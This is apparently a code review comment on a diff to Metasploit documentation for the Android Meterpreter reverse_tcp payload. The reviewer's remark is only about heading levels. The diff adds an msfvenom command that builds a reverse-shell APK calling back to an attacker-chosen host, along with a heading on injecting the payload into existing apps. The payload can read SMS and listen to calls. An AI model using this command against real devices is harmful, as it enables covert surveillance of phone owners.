documentation/modules/payload/android/meterpreter/reverse_tcp.md

```diff
@@ -4,6 +4,29 @@ do with it already.
 
 The Android Meterpreter allows you to do things like take remote control the file system, listen to phone calls, retrieve or send SMS messages, geo-locate the user, run post-exploitation modules, etc.
 
+
+### To create the APK with msfvenom:
+
+```
+./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
+```
+
+### To inject meterpreter into an existing APK with msfvenom:
```

Comment:
```suggestion
## To inject meterpreter into an existing APK with msfvenom:
```

This isn't really a subsection and so it should follow the same level 2 heading format as the rest of this document.